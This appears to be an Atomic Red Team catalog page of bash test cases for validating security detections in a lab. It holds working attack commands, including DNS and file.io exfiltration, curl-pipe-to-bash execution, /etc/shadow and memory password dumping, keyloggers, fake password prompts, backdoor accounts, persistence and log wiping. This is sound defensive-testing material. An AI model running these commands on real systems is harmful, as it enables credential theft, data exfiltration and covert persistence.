Home/Atomic Tests
Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
filter by technique id in the URL: /atomic?technique=T1059

Matching tests · bash

126
T1003.007 bash elevated linux Capture Passwords with MimiPenguin
Proc Filesystem
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
T1003.008 bash elevated linux Access /etc/shadow (Local)
/etc/passwd and /etc/shadow
/etc/shadow file is accessed in Linux environments
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
T1005 bash linux Find and dump sqlite databases (Linux)
Data from Local System
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
T1007 bash linux System Service Discovery - systemctl/service
System Service Discovery
Enumerates system service using systemctl/service
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
T1016 bash elevated macos List macOS Firewall Rules
System Network Configuration Discovery
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using defaults, additional arguments can be added to see filtered details, such as globalstate for global configuration (\"Is it on or off?\"), firewall for common application allow rules, and explicitauths for specific rules configured by the user. Using socketfilterfw, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
T1016.001 bash macos, linux Check internet connection using ping freebsd, linux or macos
Internet Connection Discovery
Check internet connection using ping on Linux, MACOS. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -c 4 #{ping_target}
T1027.013 bash linux, macos Password-Protected ZIP Payload Extraction and Execution
Encrypted/Encoded File
Extracts and executes a script from a password-protected ZIP archive. This technique is commonly used by malware families like Emotet and QBot to deliver payloads via email attachments where the password is provided in the message body. The encrypted ZIP evades static file analysis until extracted at runtime. Upon successful execution, displays confirmation and system information.
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
T1037.004 bash elevated macos rc.common
RC Scripts
Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
T1037.004 bash elevated linux rc.common
RC Scripts
Modify rc.common
filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
sudo chmod +x /etc/rc.common
T1037.005 bash elevated macos Add launch script to launch daemon
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
sudo /Library/StartupItems/atomic.sh start
T1037.005 bash elevated macos Add launch script to launch agent
Startup Items
Add launch script to /Library/StartupItems to launch agent [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)
sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
sudo cp #{path_malicious_script} /Library/StartupItems/atomic.sh
sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
/Library/StartupItems/atomic.sh start
T1040 bash elevated linux Packet Capture Linux using tshark or tcpdump
Network Sniffing
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
T1040 bash elevated macos Packet Capture macOS using tcpdump or tshark
Network Sniffing
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
sudo tcpdump -c 5 -nnni #{interface}    
if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi;
T1040 bash elevated macos Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
sudo #{program_path} -i #{ifname} -t 3
T1040 bash elevated macos Filtered Packet Capture macOS using /dev/bpfN with sudo
Network Sniffing
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
sudo #{program_path} -f -i #{ifname} -t 3
T1040 bash elevated linux Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
Network Sniffing
Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few seconds.
sudo #{program_path} -a -t 3
T1040 bash elevated linux Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo
Network Sniffing
Captures packets with domain=AF_INET,type=SOCK_RAW,protocol=TCP for a few seconds.
sudo #{program_path} -4 -p 6 -t 3
T1040 bash elevated linux Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo
Network Sniffing
Captures packets with domain=AF_INET,type=SOCK_PACKET,protocol=UDP for a few seconds. SOCK_PACKET is "obsolete" according to the man page, but still works on Ubuntu 20.04
sudo #{program_path} -4 -P -p 17 -t 3
T1040 bash elevated linux Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo
Network Sniffing
Captures packets with domain=AF_PACKET,type=SOCK_RAW for a few seconds. Sets a BPF filter on the socket to filter for UDP traffic.
sudo #{program_path} -a -f -t 3
T1046 bash linux, macos Port Scan
Network Service Discovery
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1048 bash macos, linux Exfiltrate Data using DNS Queries via dig
Exfiltration Over Alternative Protocol
This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and making DNS queries via the dig command to a controlled DNS server.
dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
T1048.002 bash macos, linux Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data HTTPS using curl to file share site file.io
curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
T1049 bash linux, macos System Network Connections Discovery via ss or lsof (Linux/MacOS)
System Network Connections Discovery
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1053.002 bash containers At - Schedule a job via kubectl in a Pod
At
Launches a short-lived Ubuntu pod, installs the at utility, starts the atd daemon, and submits a job with at. The pod is deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
T1053.003 bash elevated macos, linux Cron - Add script to all cron subfolders
Cron
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 bash elevated linux Cron - Add script to /var/spool/cron/crontabs/ folder
Cron
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.006 bash elevated linux Create Systemd Service and Timer
Systemd Timers
This test creates Systemd service and timer then starts and enables the Systemd timer
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
systemctl start #{systemd_timer_name}
systemctl enable #{systemd_timer_name}
systemctl daemon-reload
T1053.007 bash containers ListCronjobs
Container Orchestration Job
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
kubectl get cronjobs -n #{namespace}
T1053.007 bash containers CreateCronjob
Container Orchestration Job
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
kubectl create -f src/cronjob.yaml -n #{namespace}
T1056.001 bash linux Bash session based keylogger
Keylogging
When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}
T1056.001 bash macos MacOS Swift Keylogger
Keylogging
Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
swift #{swift_src} -keylog
T1056.002 bash macos AppleScript - Prompt User for Password
GUI Input Capture
Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
T1056.002 bash macos AppleScript - Spoofing a credential prompt using osascript
GUI Input Capture
Prompt user for password without requiring permissions to send Apple events to System Settings. https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo $PWD_SPOOF
T1059.004 bash elevated linux Change login shell
Unix Shell
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1070.003 bash linux, macos Clear and Disable Bash History Logging
Clear Command History
Clears the history and disable bash history logging of the current shell and future shell sessions
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
T1070.003 bash elevated linux Clear Docker Container Logs
Clear Command History
Clears Docker container logs using the Docker CLI and the truncate command, removing all log entries.
docker container prune -f && sudo truncate -s 0 /var/lib/docker/containers/*/*-json.log
T1070.008 bash elevated linux Copy and Delete Mailbox Data on Linux
Clear Mailbox Data
Copies and deletes mail data on Linux
mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*
T1070.008 bash elevated macos Copy and Delete Mailbox Data on macOS
Clear Mailbox Data
Copies and deletes mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
rm -rf ~/Library/Mail/copy/*
T1070.008 bash elevated linux Copy and Modify Mailbox Data on Linux
Clear Mailbox Data
Copies and modifies mail data on Linux
mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ "$(basename "$file")" != "copy" ]; then cp -R "$file" /var/spool/mail/copy/; if [ -f "/var/spool/mail/copy/$(basename "$file")" ]; then echo "Modification for Atomic Red Test" >> "/var/spool/mail/copy/$(basename "$file")"; fi; fi; done
T1070.008 bash elevated macos Copy and Modify Mailbox Data on macOS
Clear Mailbox Data
Copies and modifies mail data on macOS
mkdir ~/Library/Mail/copy
cp -R ~/Library/Mail/* ~/Library/Mail/copy
echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
T1078.003 bash elevated macos Create local account with admin privileges - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
T1078.003 bash elevated macos Create local account with admin privileges using sysadminctl utility - MacOS
Local Accounts
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
T1078.003 bash elevated macos Enable root account using dsenableroot utility - MacOS
Local Accounts
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
T1078.003 bash elevated macos Add a new/existing user to the admin group using dseditgroup utility - macOS
Local Accounts
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
T1078.003 bash elevated linux Create local account (Linux)
Local Accounts
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
T1078.003 bash elevated linux Reactivate a locked/expired account (Linux)
Local Accounts
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
T1078.003 bash elevated linux Login as nobody (Linux)
Local Accounts
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in /etc/passwd before the test is executed and right after the cleanup: # - nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
T1082 bash elevated linux Linux VM Check via Hardware
System Information Discovery
Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.
if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi
if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi
if [ -f /sys/class/dmi/id/chassis_vendor ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi
if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi
if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi
if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi
if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"; fi
if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"; fi
T1082 bash elevated linux Linux VM Check via Kernel Modules
System Information Discovery
Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
T1105 bash linux, macos sftp remote file copy (push)
Ingress Tool Transfer
Utilize sftp to perform a remote file copy (push)
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
T1105 bash containers Curl Insecure Connection from a Pod
Ingress Tool Transfer
Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure) against a target URL. The pod is automatically deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
T1110.001 bash elevated linux SUDO Brute Force - Debian
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su -c "cd /tmp; curl -s #{remote_url} | bash" art
T1110.001 bash elevated linux SUDO Brute Force - Redhat
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
T1110.001 bash elevated linux SUDO Brute Force - FreeBSD
Password Guessing
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
su art
cd /tmp
curl -s #{remote_url} |bash
T1110.004 bash linux SSH Credential Stuffing From Linux
Credential Stuffing
Using username,password combination from a password dump to login over SSH.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1110.004 bash macos SSH Credential Stuffing From MacOS
Credential Stuffing
Using username,password combination from a password dump to login over SSH.
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1113 bash macos Screencapture
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture #{output_file}
T1113 bash macos Screencapture (silent)
Screen Capture
Use screencapture command to collect a full desktop screenshot
screencapture -x #{output_file}
T1113 bash linux X Windows Capture
Screen Capture
Use xwd command to collect a full desktop screenshot and review file with xwud
xwd -root -out #{output_file}
xwud -in #{output_file}
T1113 bash linux Capture Linux Desktop using Import Tool
Screen Capture
Use import command from ImageMagick to collect a full desktop screenshot
import -window root #{output_file}
T1115 bash macos Execute commands from clipboard
Clipboard Data
Echo a command to clipboard and execute it
echo ifconfig | pbcopy
$(pbpaste)
T1135 bash elevated linux Network Share Discovery - linux
Network Share Discovery
Network Share Discovery using smbstatus
smbstatus --shares
T1136.001 bash elevated linux Create a user account on a Linux system
Local Account
Create a user via useradd
useradd -M -N -r -s /bin/bash -c evil_account #{username}
T1136.001 bash elevated macos Create a user account on a MacOS system
Local Account
Creates a user on a MacOS system with dscl
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
T1136.001 bash elevated linux Create a new user in Linux with `root` UID and GID.
Local Account
Creates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
T1136.001 bash containers Create a Linux user via kubectl in a Pod
Local Account
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
T1140 bash linux, macos XOR decoding and command execution using Python
Deobfuscate/Decode Files or Information
An adversary can obfuscate malicious commands or payloads using XOR and execute them on the victim's machine. This test uses Python to decode and execute commands on the machine.
python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'
T1195.002 bash containers, linux Simulate npm package installation on a Linux system
Compromise Software Supply Chain
Launches a short‑lived Kubernetes pod using the Node 18 image, initializes a minimal npm project in /tmp/test, and installs the specified npm package without audit/fund/package‑lock options, simulating potentially suspicious package retrieval (e.g., typosquatting/dependency confusion) from within a container. The pod is deleted after execution.
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "mkdir -p /tmp/test && cd /tmp/test && npm init -y >/dev/null 2>&1 && echo '--- package.json before install ---' && cat package.json && npm install #{package_name} --no-audit --no-fund --no-package-lock && echo '--- package.json after install ---' && cat package.json"
T1201 bash linux Examine password complexity policy - Ubuntu
Password Policy Discovery
Lists the password complexity policy to console on Ubuntu Linux.
cat /etc/pam.d/common-password
T1201 bash linux Examine password complexity policy - CentOS/RHEL 7.x
Password Policy Discovery
Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
cat /etc/security/pwquality.conf
T1201 bash linux Examine password complexity policy - CentOS/RHEL 6.x
Password Policy Discovery
Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
cat /etc/pam.d/system-auth
cat /etc/security/pwquality.conf
T1201 bash linux Examine password expiration policy - All Linux
Password Policy Discovery
Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
cat /etc/login.defs
T1201 bash macos Examine password policy - macOS
Password Policy Discovery
Lists the password policy to console on macOS.
pwpolicy getaccountpolicies
T1222.002 bash linux, macos chmod - Change file or folder mode (symbolic mode) recursively
Linux and Mac Permissions
Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.
chmod -R #{symbolic_mode} #{file_or_folder}
T1222.002 bash macos, linux chown - Change file or folder ownership and group
Linux and Mac Permissions
Changes a file or folder's ownership and group information using chown.
chown #{owner}:#{group} #{file_or_folder}
T1222.002 bash macos, linux chown - Change file or folder ownership and group recursively
Linux and Mac Permissions
Changes a file or folder's ownership and group information recursively using chown.
chown -R #{owner}:#{group} #{file_or_folder}
T1222.002 bash macos, linux chown - Change file or folder ownership recursively
Linux and Mac Permissions
Changes a file or folder's ownership only recursively using chown.
chown -R #{owner} #{file_or_folder}
T1489 bash elevated linux Abuse of linux magic system request key for Send a SIGTERM to all processes
Service Stop
Adversaries with root or sufficient privileges Send a SIGTERM to all processes, except for init. By writing 'e' to /proc/sysrq-trigger, they can forced kill all processes, except for init.
echo "e" > /proc/sysrq-trigger
T1529 bash elevated linux Reboot System via `halt` - Linux
System Shutdown/Reboot
This test restarts a Linux system using halt.
halt --reboot
T1529 bash elevated linux Reboot System via `poweroff` - Linux
System Shutdown/Reboot
This test restarts a Linux system using poweroff.
poweroff --reboot
T1529 bash elevated linux Abuse of Linux Magic System Request Key for Reboot
System Shutdown/Reboot
adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can forced to reboot.
echo "b" > /proc/sysrq-trigger
T1539 bash macos Steal Chrome Cookies via Remote Debugging (Mac)
Steal Web Session Cookie
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies. If successful, this test will output a list of cookies. Note: Chrome processes will be killed during this test. See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
T1543.001 bash elevated macos Launch Agent
Launch Agent
Create a plist and execute it
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
T1543.001 bash elevated macos Event Monitor Daemon Persistence
Launch Agent
This test adds persistence via a plist to execute via the macOS Event Monitor Daemon.
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
T1543.001 bash elevated macos Launch Agent - Root Directory
Launch Agent
Create a plist and execute it
sudo cp #{path_malicious_plist} /Library/LaunchAgents/#{plist_filename}
launchctl load -w /Library/LaunchAgents/#{plist_filename}
T1543.002 bash elevated linux Create Systemd Service
Systemd Service
This test creates a Systemd service unit file and enables it as a service.
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
